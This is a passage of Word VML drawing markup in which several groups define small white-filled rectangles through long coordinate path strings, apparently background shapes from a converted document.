,6813,2680,6817,2680,6821,2680,6826,2680,6830,2680,6834,2680,6839,2680,6843,2680,6848,2680,6853,2680,6858,2680,6863,2680,6868,2680,6873,2680,6878,2680,6883,2680,6889,2680,6894,2680,6900,2680,6906,2680,6912,2680,6918,2680,6924,2680,6930,2680,6936,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2679,6942,2679,6942,2679,6942,2679,6942,2679,6942,2679,6942,2679,6942,2678,6942,2678,6942,2678,6942,2678,6942,2678,6942,2677,6942,2677,6942,2677,6942,2676,6942,2676,6942,2676,6942,2675,6942,2675,6942,2675,6942,2674,6942,2674,6942,2673,6942,2673,6942,2672,6942,2672,6942,2671,6942,2671,6942,2670,6942,2670,6942,2669,6942,2668,6942,2668,6942,2667,6942,2666,6942,2666,6942,2665,6942,2664,6942,2663,6942,2663,6942,2662,6942,2661,6942,2660,6942,2659,6942,2658,6942,2657,6942,2656,6942,2655,6942,2654,6942,2653,6942,2651,6942,2650,6942,2649,6942,2648,6942,2647,6942,2645,6942,2644,6942,2642,6942,2641,6942,2640,6942,2638,6942,2637,6942,2635,6942,2633,6942,2632,6942,2630,6942,2628,6942,2627,6942,2625,6942,2623,6942,2621,6942,2619,6942,2617,6942,2615,6942,2613,6942,2611,6942,2609,6942,2607,6942,2605,6942,2602,6942,2600,6942,2598,6942,2595,6942,2593,6942,2591,6942,2588,6942,2586,6942,2583,6942,2580,6942,2578,6942,2575,6942,2572,6942,2569,6942,2566,6942,2563,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6942,2560,6941,2560,6941,2560,6941,2560,6941,2560,6941,2560,6940,2560,6940,2560,6940,2560,6940,2560,6939,2560,6939,2560,6938,2560,6938,2560,6938,2560,6937,2560,6937,2560,6936,2560,6935,2560,6935,2560,6934,2560,6934,2560,6933,2560,6932,2560,6931,2560,6930,2560,6930,2560,6929,2560,6928,2560,6927,2560,6926,2560,6925,2560,6924,2560,6922,2560,6921,2560,6920,2560,6919,2560,6917,2560,6916,2560,6914,2560,6913,2560,6911,2560,6910,2560,6908,2560,6906,2560,6905,2560,6903,2560,6901,2560,6899,2560,6897,2560,6895,2560,6893,2560,6891,2560,6888,2560,6886,2560,6884,2560,6881,2560,6879,2560,6876,2560,6873,2560,6871,2560,6868,2560,6865,2560,6862,2560,6859,2560,6856,2560,6853,2560,6850,2560,6846,2560,6843,2560,6839,2560,6836,2560,6832,2560,6828,2560,6825,2560,6821,2560,6817,2560,6813,2560,6809,2560,6804,2560,6800,2560,6796,2560,6791,2560,6787,2560,6782,2560,6777,2560,6772,2560,6767,2560,6762,2560,6757,2560,6752,2560,6746,2560,6741,2560,6735,2560,6730,2560,6724,2560,6718,2560,6712,2560,6706,2560,6700,2560,6694,2560,6687e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:333.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,6670" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:6670;width:130;height:270" coordorigin="2670,6670" coordsize="130,270" path="m2680,6687l2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2681,6687,2681,6687,2681,6687,2681,6687,2681,6687,2681,6687,2681,6687,2681,6687,2681,6687,2681,6687,2681,6687,2681,6687,2681,6687,2682,6687,2682,6687,2682,6687,2682,6687,2682,6687,2682,6687,2683,6687,2683,6687,2683,6687,2683,6687,2684,6687,2684,6687,2684,6687,2685,6687,2685,6687,2685,6687,2686,6687,2686,6687,2686,6687,2687,6687,2687,6687,2688,6687,2688,6687,2689,6687,2689,6687,2690,6687,2690,6687,2691,6687,2692,6687,2692,6687,2693,6687,2694,6687,2694,6687,2695,6687,2696,6687,2697,6687,2697,6687,2698,6687,2699,6687,2700,6687,2701,6687,2702,6687,2703,6687,2704,6687,2705,6687,2706,6687,2707,6687,2708,6687,2709,6687,2710,6687,2712,6687,2713,6687,2714,6687,2715,6687,2717,6687,2718,6687,2720,6687,2721,6687,2723,6687,2724,6687,2726,6687,2727,6687,2729,6687,2731,6687,2732,6687,2734,6687,2736,6687,2738,6687,2740,6687,2741,6687,2743,6687,2745,6687,2747,6687,2749,6687,2752,6687,2754,6687,2756,6687,2758,6687,2760,6687,2763,6687,2765,6687,2768,6687,2770,6687,2773,6687,2775,6687,2778,6687,2780,6687,2783,6687,2786,6687,2789,6687,2792,6687,2794,6687,2797,6687,2800,6687,2800,6687,2800,6687,2800,6687,2800,6687,2800,6687,2800,6687,2800,6687,2800,6687,2800,6687,2800,6687,2800,6688,2800,6688,2800,6688,2800,6688,2800,6688,2800,6688,2800,6688,2800,6688,2800,6688,2800,6688,2800,6689,2800,6689,2800,6689,2800,6689,2800,6689,2800,6690,2800,6690,2800,6690,2800,6691,2800,6691,2800,6691,2800,6692,2800,6692,2800,6693,2800,6693,2800,6694,2800,6694,2800,6695,2800,6696,2800,6696,2800,6697,2800,6698,2800,6699,2800,6699,2800,6700,2800,6701,2800,6702,2800,6703,2800,6704,2800,6705,2800,6706,2800,6707,2800,6709,2800,6710,2800,6711,2800,6713,2800,6714,2800,6715,2800,6717,2800,6718,2800,6720,2800,6722,2800,6723,2800,6725,2800,6727,2800,6729,2800,6731,2800,6733,2800,6735,2800,6737,2800,6739,2800,6742,2800,6744,2800,6746,2800,6749,2800,6751,2800,6754,2800,6756,2800,6759,2800,6762,2800,6765,2800,6768,2800,6771,2800,6774,2800,6777,2800,6780,2800,6784,2800,6787,2800,6791,2800,6794,2800,6798,2800,6801,2800,6805,2800,6809,2800,6813,2800,6817,2800,6821,2800,6826,2800,6830,2800,6834,2800,6839,2800,6843,2800,6848,2800,6853,2800,6858,2800,6863,2800,6868,2800,6873,2800,6878,2800,6883,2800,6889,2800,6894,2800,6900,2800,6906,2800,6912,2800,6918,2800,6924,2800,6930,2800,6936,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2800,6942,2799,6942,2799,6942,2799,6942,2799,6942,2799,6942,2799,6942,2798,6942,2798,6942,2798,6942,2798,6942,2798,6942,2797,6942,2797,6942,2797,6942,2797,6942,2796,6942,2796,6942,2795,6942,2795,6942,2795,6942,2794,6942,2794,6942,2793,6942,2793,6942,2793,6942,2792,6942,2792,6942,2791,6942,2790,6942,2790,6942,2789,6942,2789,6942,2788,6942,2787,6942,2787,6942,2786,6942,2785,6942,2784,6942,2783,6942,2783,6942,2782,6942,2781,6942,2780,6942,2779,6942,2778,6942,2777,6942,2776,6942,2775,6942,2774,6942,2773,6942,2772,6942,2770,6942,2769,6942,2768,6942,2767,6942,2765,6942,2764,6942,2763,6942,2761,6942,2760,6942,2758,6942,2757,6942,2755,6942,2753,6942,2752,6942,2750,6942,2748,6942,2747,6942,2745,6942,2743,6942,2741,6942,2739,6942,2737,6942,2735,6942,2733,6942,2731,6942,2729,6942,2727,6942,2725,6942,2723,6942,2720,6942,2718,6942,2716,6942,2713,6942,2711,6942,2708,6942,2706,6942,2703,6942,2700,6942,2698,6942,2695,6942,2692,6942,2689,6942,2686,6942,2683,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6942,2680,6941,2680,6941,2680,6941,2680,6941,2680,6941,2680,6940,2680,6940,2680,6940,2680,6940,2680,6939,2680,6939,2680,6938,2680,6938,2680,6938,2680,6937,2680,6937,2680,6936,2680,6935,2680,6935,2680,6934,2680,6934,2680,6933,2680,6932,2680,6931,2680,6930,2680,6930,2680,6929,2680,6928,2680,6927,2680,6926,2680,6925,2680,6924,2680,6922,2680,6921,2680,6920,2680,6919,2680,6917,2680,6916,2680,6914,2680,6913,2680,6911,2680,6910,2680,6908,2680,6906,2680,6905,2680,6903,2680,6901,2680,6899,2680,6897,2680,6895,2680,6893,2680,6891,2680,6888,2680,6886,2680,6884,2680,6881,2680,6879,2680,6876,2680,6873,2680,6871,2680,6868,2680,6865,2680,6862,2680,6859,2680,6856,2680,6853,2680,6850,2680,6846,2680,6843,2680,6839,2680,6836,2680,6832,2680,6828,2680,6825,2680,6821,2680,6817,2680,6813,2680,6809,2680,6804,2680,6800,2680,6796,2680,6791,2680,6787,2680,6782,2680,6777,2680,6772,2680,6767,2680,6762,2680,6757,2680,6752,2680,6746,2680,6741,2680,6735,2680,6730,2680,6724,2680,6718,2680,6712,2680,6706,2680,6700,2680,6694,2680,6687e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:289.500pt;margin-top:333.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5790,6670" coordsize="130,270">
        <v:shape style="position:absolute;left:5790;top:6670;width:130;height:270" coordorigin="5790,6670" coordsize="130,270" path="m5802,6687l5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5802,6687,5803,6687,5803,6687,5803,6687,5803,6687,5803,6687,5803,6687,5803,6687,5803,6687,5804,6687,5804,6687,5804,6687,5804,6687,5804,6687,5805,6687,5805,6687,5805,6687,5806,6687,5806,6687,5806,6687,5806,6687,5807,6687,5807,6687,5808,6687,5808,6687,5808,6687,5809,6687,5809,6687,5810,6687,5810,6687,5811,6687,5811,6687,5812,6687,5813,6687,5813,6687,5814,6687,5814,6687,5815,6687,5816,6687,5817,6687,5817,6687,5818,6687,5819,6687,5820,6687,5821,6687,5821,6687,5822,6687,5823,6687,5824,6687,5825,6687,5826,6687,5827,6687,5829,6687,5830,6687,5831,6687,5832,6687,5833,6687,5834,6687,5836,6687,5837,6687,5838,6687,5840,6687,5841,6687,5843,6687,5844,6687,5846,6687,5847,6687,5849,6687,5850,6687,5852,6687,5854,6687,5856,6687,5857,6687,5859,6687,5861,6687,5863,6687,5865,6687,5867,6687,5869,6687,5871,6687,5873,6687,5875,6687,5878,6687,5880,6687,5882,6687,5884,6687,5887,6687,5889,6687,5892,6687,5894,6687,5897,6687,5899,6687,5902,6687,5905,6687,5907,6687,5910,6687,5913,6687,5916,6687,5919,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6688,5922,6688,5922,6688,5922,6688,5922,6688,5922,6688,5922,6688,5922,6688,5922,6688,5922,6688,5922,6689,5922,6689,5922,6689,5922,6689,5922,6689,5922,6690,5922,6690,5922,6690,5922,6691,5922,6691,5922,6691,5922,6692,5922,6692,5922,6693,5922,6693,5922,6694,5922,6694,5922,6695,5922,6696,5922,6696,5922,6697,5922,6698,5922,6699,5922,6699,5922,6700,5922,6701,5922,6702,5922,6703,5922,6704,5922,6705,5922,6706,5922,6707,5922,6709,5922,6710,5922,6711,5922,6713,5922,6714,5922,6715,5922,6717,5922,6718,5922,6720,5922,6722,5922,6723,5922,6725,5922,6727,5922,6729,5922,6731,5922,6733,5922,6735,5922,6737,5922,6739,5922,6742,5922,6744,5922,6746,5922,6749,5922,6751,5922,6754,5922,6756,5922,6759,5922,6762,5922,6765,5922,6768,5922,6771,5922,6774,5922,6777,5922,6780,5922,6784,5922,6787,5922,6791,5922,6794,5922,6798,5922,6801,5922,6805,5922,6809,5922,6813,5922,6817,5922,6821,5922,6826,5922,6830,5922,6834,5922,6839,5922,6843,5922,6848,5922,6853,5922,6858,5922,6863,5922,6868,5922,6873,5922,6878,5922,6883,5922,6889,5922,6894,5922,6900,5922,6906,5922,6912,5922,6918,5922,6924,5922,6930,5922,6936,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5921,6942,5921,6942,5921,6942,5921,6942,5921,6942,5921,6942,5921,6942,5921,6942,5921,6942,5920,6942,5920,6942,5920,6942,5920,6942,5920,6942,5919,6942,5919,6942,5919,6942,5919,6942,5918,6942,5918,6942,5918,6942,5917,6942,5917,6942,5917,6942,5916,6942,5916,6942,5915,6942,5915,6942,5915,6942,5914,6942,5914,6942,5913,6942,5913,6942,5912,6942,5911,6942,5911,6942,5910,6942,5909,6942,5909,6942,5908,6942,5907,6942,5907,6942,5906,6942,5905,6942,5904,6942,5903,6942,5902,6942,5902,6942,5901,6942,5900,6942,5899,6942,5898,6942,5896,6942,5895,6942,5894,6942,5893,6942,5892,6942,5891,6942,5889,6942,5888,6942,5887,6942,5886,6942,5884,6942,5883,6942,5881,6942,5880,6942,5878,6942,5877,6942,5875,6942,5873,6942,5872,6942,5870,6942,5868,6942,5867,6942,5865,6942,5863,6942,5861,6942,5859,6942,5857,6942,5855,6942,5853,6942,5851,6942,5849,6942,5846,6942,5844,6942,5842,6942,5840,6942,5837,6942,5835,6942,5832,6942,5830,6942,5827,6942,5825,6942,5822,6942,5819,6942,5816,6942,5814,6942,5811,6942,5808,6942,5805,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6942,5802,6941,5802,6941,5802,6941,5802,6941,5802,6941,5802,6940,5802,6940,5802,6940,5802,6940,5802,6939,5802,6939,5802,6938,5802,6938,5802,6938,5802,6937,5802,6937,5802,6936,5802,6935,5802,6935,5802,6934,5802,6934,5802,6933,5802,6932,5802,6931,5802,6930,5802,6930,5802,6929,5802,6928,5802,6927,5802,6926,5802,6925,5802,6924,5802,6922,5802,6921,5802,6920,5802,6919,5802,6917,5802,6916,5802,6914,5802,6913,5802,6911,5802,6910,5802,6908,5802,6906,5802,6905,5802,6903,5802,6901,5802,6899,5802,6897,5802,6895,5802,6893,5802,6891,5802,6888,5802,6886,5802,6884,5802,6881,5802,6879,5802,6876,5802,6873,5802,6871,5802,6868,5802,6865,5802,6862,5802,6859,5802,6856,5802,6853,5802,6850,5802,6846,5802,6843,5802,6839,5802,6836,5802,6832,5802,6828,5802,6825,5802,6821,5802,6817,5802,6813,5802,6809,5802,6804,5802,6800,5802,6796,5802,6791,5802,6787,5802,6782,5802,6777,5802,6772,5802,6767,5802,6762,5802,6757,5802,6752,5802,6746,5802,6741,5802,6735,5802,6730,5802,6724,5802,6718,5802,6712,5802,6706,5802,6700,5802,6694,5802,6687e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:295.500pt;margin-top:333.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5910,6670" coordsize="130,270">
        <v:shape style="position:absolute;left:5910;top:6670;width:130;height:270" coordorigin="5910,6670" coordsize="130,270" path="m5922,6687l5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5922,6687,5923,6687,5923,6687,5923,6687,5923,6687,5923,6687,5923,6687,5923,6687,5923,6687,5924,6687,5924,6687,5924,6687,5924,6687,5924,6687,5925,6687,5925,6687,5925,6687,5925,6687,5926,6687,5926,6687,5926,6687,5927,6687,5927,6687,5927,6687,5928,6687,5928,6687,5928,6687,5929,6687,5929,6687,5930,6687,5930,6687,5931,6687,5931,6687,5932,6687,5933,6687,5933,6687,5934,6687,5934,6687,5935,6687,5936,6687,5937,6687,5937,6687,5938,6687,5939,6687,5940,6687,5941,6687,5942,6687,5942,6687,5943,6687,5944,6687,5945,6687,5946,6687,5947,6687,5949,6687,5950,6687,5951,6687,5952,6687,5953,6687,5955,6687,5956,6687,5957,6687,5958,6687,5960,6687,5961,6687,5963,6687,5964,6687,5966,6687,5967,6687,5969,6687,5971,6687,5972,6687,5974,6687,5976,6687,5977,6687,5979,6687,5981,6687,5983,6687,5985,6687,5987,6687,5989,6687,5991,6687,5993,6687,5995,6687,5998,6687,6000,6687,6002,6687,6004,6687,6007,6687,6009,6687,6012,6687,6014,6687,6017,6687,6019,6687,6022,6687,6025,6687,6028,6687,6030,6687,6033,6687,6036,6687,6039,6687,6042,6687,6042,6687,6042,6687,6042,6687,6042,6687,6042,6687,6042,6687,6042,6687,6042,6687,6042,6687,6042,6687,6042,6688,6042,6688,6042,6688,6042,6688,6042,6688,6042,6688,6042,6688,6042,6688,6042,6688,6042,6688,6042,6689,6042,6689,6042,6689,6042,6689,6042,6689,6042,6690,6042,6690,6042,6690,6042,6691,6042,6691,6042,6691,6042,6692,6042,6692,6042,6693,6042,6693,6042,6694,6042,6694,6042,6695,6042,6696,6042,6696,6042,6697,6042,6698,6042,6699,6042,6699,6042,6700,6042,6701,6042,6702,6042,6703,6042,6704,6042,6705,6042,6706,6042,6707,6042,6709,6042,6710,6042,6711,6042,6713,6042,6714,6042,6715,6042,6717,6042,6718,6042,6720,6042,6722,6042,6723,6042,6725,6042,6727,6042,6729,6042,6731,6042,6733,6042,6735,6042,6737,6042,6739,6042,6742,6042,6744,6042,6746,6042,6749,6042,6751,6042,6754,6042,6756,6042,6759,6042,6762,6042,6765,6042,6768,6042,6771,6042,6774,6042,6777,6042,6780,6042,6784,6042,6787,6042,6791,6042,6794,6042,6798,6042,6801,6042,6805,6042,6809,6042,6813,6042,6817,6042,6821,6042,6826,6042,6830,6042,6834,6042,6839,6042,6843,6042,6848,6042,6853,6042,6858,6042,6863,6042,6868,6042,6873,6042,6878,6042,6883,6042,6889,6042,6894,6042,6900,6042,6906,6042,6912,6042,6918,6042,6924,6042,6930,6042,6936,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6042,6942,6041,6942,6041,6942,6041,6942,6041,6942,6041,6942,6041,6942,6041,6942,6041,6942,6040,6942,6040,6942,6040,6942,6040,6942,6040,6942,6039,6942,6039,6942,6039,6942,6039,6942,6038,6942,6038,6942,6038,6942,6037,6942,6037,6942,6037,6942,6036,6942,6036,6942,6036,6942,6035,6942,6035,6942,6034,6942,6034,6942,6033,6942,6033,6942,6032,6942,6031,6942,6031,6942,6030,6942,6030,6942,6029,6942,6028,6942,6027,6942,6027,6942,6026,6942,6025,6942,6024,6942,6023,6942,6022,6942,6022,6942,6021,6942,6020,6942,6019,6942,6018,6942,6017,6942,6015,6942,6014,6942,6013,6942,6012,6942,6011,6942,6010,6942,6008,6942,6007,6942,6006,6942,6004,6942,6003,6942,6001,6942,6000,6942,5998,6942,5997,6942,5995,6942,5993,6942,5992,6942,5990,6942,5988,6942,5987,6942,5985,6942,5983,6942,5981,6942,5979,6942,5977,6942,5975,6942,5973,6942,5971,6942,5969,6942,5966,6942,5964,6942,5962,6942,5960,6942,5957,6942,5955,6942,5952,6942,5950,6942,5947,6942,5945,6942,5942,6942,5939,6942,5936,6942,5934,6942,5931,6942,5928,6942,5925,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6942,5922,6941,5922,6941,5922,6941,5922,6941,5922,6941,5922,6940,5922,6940,5922,6940,5922,6940,5922,6939,5922,6939,5922,6938,5922,6938,5922,6938,5922,6937,5922,6937,5922,6936,5922,6935,5922,6935,5922,6934,5922,6934,5922,6933,5922,6932,5922,6931,5922,6930,5922,6930,5922,6929,5922,6928,5922,6927,5922,6926,5922,6925,5922,6924,5922,6922,5922,6921,5922,6920,5922,6919,5922,6917,5922,6916,5922,6914,5922,6913,5922,6911,5922,6910,5922,6908,5922,6906,5922,6905,5922,6903,5922,6901,5922,6899,5922,6897,5922,6895,5922,6893,5922,6891,5922,6888,5922,6886,5922,6884,5922,6881,5922,6879,5922,6876,5922,6873,5922,6871,5922,6868,5922,6865,5922,6862,5922,6859,5922,6856,5922,6853,5922,6850,5922,6846,5922,6843,5922,6839,5922,6836,5922,6832,5922,6828,5922,6825,5922,6821,5922,6817,5922,6813,5922,6809,5922,6804,5922,6800,5922,6796,5922,6791,5922,6787,5922,6782,5922,6777,5922,6772,5922,6767,5922,6762,5922,6757,5922,6752,5922,6746,5922,6741,5922,6735,5922,6730,5922,6724,5922,6718,5922,6712,5922,6706,5922,6700,5922,6694,5922,6687e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:451.500pt;margin-top:360.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9030,7210" coordsize="130,270">
        <v:shape style="position:absolute;left:9030;top:7210;width:130;height:270" coordorigin="9030,7210" coordsize="130,270" path="m9044,7228l9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9044,7228,9045,7228,9045,7228,9045,7228,9045,7228,9045,7228,9045,7228,9045,7228,9046,7228,9046,7228,9046,7228,9046,7228,9047,7228,9047,7228,9047,7228,9047,7228,9048,7228,9048,7228,9048,7228,9049,7228,9049,7228,9050,7228,9050,7228,9050,7228,9051,7228,9051,7228,9052,7228,9052,7228,9053,7228,9054,7228,9054,7228,9055,7228,9055,7228,9056,7228,9057,7228,9057,7228,9058,7228,9059,7228,9060,7228,9061,7228,9061,7228,9062,7228,9063,7228,9064,7228,9065,7228,9066,7228,9067,7228,9068,7228,9069,7228,9070,7228,9071,7228,9072,7228,9074,7228,9075,7228,9076,7228,9077,7228,9079,7228,9080,7228,9081,7228,9083,7228,9084,7228,9086,7228,9087,7228,9089,7228,9090,7228,9092,7228,9094,7228,9095,7228,9097,7228,9099,7228,9101,7228,9103,7228,9105,7228,9107,7228,9109,7228,9111,7228,9113,7228,9115,7228,9117,7228,9119,7228,9121,7228,9124,7228,9126,7228,9128,7228,9131,7228,9133,7228,9136,7228,9138,7228,9141,7228,9144,7228,9146,7228,9149,7228,9152,7228,9155,7228,9158,7228,9161,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7229,9164,7229,9164,7229,9164,7229,9164,7229,9164,7229,9164,7230,9164,7230,9164,7230,9164,7231,9164,7231,9164,7231,9164,7232,9164,7232,9164,7233,9164,7233,9164,7234,9164,7234,9164,7235,9164,7235,9164,7236,9164,7237,9164,7237,9164,7238,9164,7239,9164,7240,9164,7241,9164,7241,9164,7242,9164,7243,9164,7244,9164,7245,9164,7247,9164,7248,9164,7249,9164,7250,9164,7251,9164,7253,9164,7254,9164,7256,9164,7257,9164,7259,9164,7260,9164,7262,9164,7264,9164,7265,9164,7267,9164,7269,9164,7271,9164,7273,9164,7275,9164,7277,9164,7280,9164,7282,9164,7284,9164,7287,9164,7289,9164,7292,9164,7294,9164,7297,9164,7299,9164,7302,9164,7305,9164,7308,9164,7311,9164,7314,9164,7317,9164,7321,9164,7324,9164,7327,9164,7331,9164,7334,9164,7338,9164,7342,9164,7346,9164,7349,9164,7353,9164,7357,9164,7362,9164,7366,9164,7370,9164,7375,9164,7379,9164,7384,9164,7388,9164,7393,9164,7398,9164,7403,9164,7408,9164,7413,9164,7418,9164,7424,9164,7429,9164,7435,9164,7440,9164,7446,9164,7452,9164,7458,9164,7464,9164,7470,9164,7476,9164,7483,9164,7483,9164,7483,9164,7483,9164,7483,9164,7483,9164,7483,9164,7483,9164,7483,9164,7483,9164,7483,9164,7483,9164,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9163,7483,9162,7483,9162,7483,9162,7483,9162,7483,9162,7483,9161,7483,9161,7483,9161,7483,9161,7483,9161,7483,9160,7483,9160,7483,9160,7483,9159,7483,9159,7483,9159,7483,9158,7483,9158,7483,9158,7483,9157,7483,9157,7483,9156,7483,9156,7483,9155,7483,9155,7483,9154,7483,9154,7483,9153,7483,9152,7483,9152,7483,9151,7483,9150,7483,9150,7483,9149,7483,9148,7483,9147,7483,9147,7483,9146,7483,9145,7483,9144,7483,9143,7483,9142,7483,9141,7483,9140,7483,9139,7483,9138,7483,9137,7483,9136,7483,9135,7483,9134,7483,9132,7483,9131,7483,9130,7483,9128,7483,9127,7483,9126,7483,9124,7483,9123,7483,9121,7483,9120,7483,9118,7483,9117,7483,9115,7483,9113,7483,9112,7483,9110,7483,9108,7483,9106,7483,9104,7483,9103,7483,9101,7483,9099,7483,9097,7483,9094,7483,9092,7483,9090,7483,9088,7483,9086,7483,9083,7483,9081,7483,9079,7483,9076,7483,9074,7483,9071,7483,9069,7483,9066,7483,9064,7483,9061,7483,9058,7483,9055,7483,9052,7483,9050,7483,9047,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7483,9044,7482,9044,7482,9044,7482,9044,7482,9044,7482,9044,7482,9044,7482,9044,7482,9044,7481,9044,7481,9044,7481,9044,7481,9044,7480,9044,7480,9044,7480,9044,7479,9044,7479,9044,7479,9044,7478,9044,7478,9044,7477,9044,7477,9044,7476,9044,7476,9044,7475,9044,7474,9044,7474,9044,7473,9044,7472,9044,7472,9044,7471,9044,7470,9044,7469,9044,7468,9044,7467,9044,7466,9044,7465,9044,7464,9044,7463,9044,7461,9044,7460,9044,7459,9044,7458,9044,7456,9044,7455,9044,7453,9044,7452,9044,7450,9044,7448,9044,7447,9044,7445,9044,7443,9044,7441,9044,7439,9044,7437,9044,7435,9044,7433,9044,7431,9044,7429,9044,7426,9044,7424,9044,7421,9044,7419,9044,7416,9044,7414,9044,7411,9044,7408,9044,7405,9044,7402,9044,7399,9044,7396,9044,7393,9044,7390,9044,7386,9044,7383,9044,7380,9044,7376,9044,7372,9044,7369,9044,7365,9044,7361,9044,7357,9044,7353,9044,7349,9044,7345,9044,7340,9044,7336,9044,7331,9044,7327,9044,7322,9044,7317,9044,7312,9044,7308,9044,7302,9044,7297,9044,7292,9044,7287,9044,7281,9044,7276,9044,7270,9044,7264,9044,7258,9044,7253,9044,7246,9044,7240,9044,7234,9044,7228e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:457.500pt;margin-top:360.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9150,7210" coordsize="130,270">
        <v:shape style="position:absolute;left:9150;top:7210;width:130;height:270" coordorigin="9150,7210" coordsize="130,270" path="m9164,7228l9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9164,7228,9165,7228,9165,7228,9165,7228,9165,7228,9165,7228,9165,7228,9166,7228,9166,7228,9166,7228,9166,7228,9166,7228,9167,7228,9167,7228,9167,7228,9168,7228,9168,7228,9168,7228,9169,7228,9169,7228,9169,7228,9170,7228,9170,7228,9171,7228,9171,7228,9171,7228,9172,7228,9173,7228,9173,7228,9174,7228,9174,7228,9175,7228,9175,7228,9176,7228,9177,7228,9178,7228,9178,7228,9179,7228,9180,7228,9181,7228,9181,7228,9182,7228,9183,7228,9184,7228,9185,7228,9186,7228,9187,7228,9188,7228,9189,7228,9190,7228,9191,7228,9192,7228,9194,7228,9195,7228,9196,7228,9197,7228,9199,7228,9200,7228,9201,7228,9203,7228,9204,7228,9206,7228,9207,7228,9209,7228,9211,7228,9212,7228,9214,7228,9216,7228,9217,7228,9219,7228,9221,7228,9223,7228,9225,7228,9227,7228,9229,7228,9231,7228,9233,7228,9235,7228,9237,7228,9239,7228,9241,7228,9244,7228,9246,7228,9248,7228,9251,7228,9253,7228,9256,7228,9258,7228,9261,7228,9264,7228,9266,7228,9269,7228,9272,7228,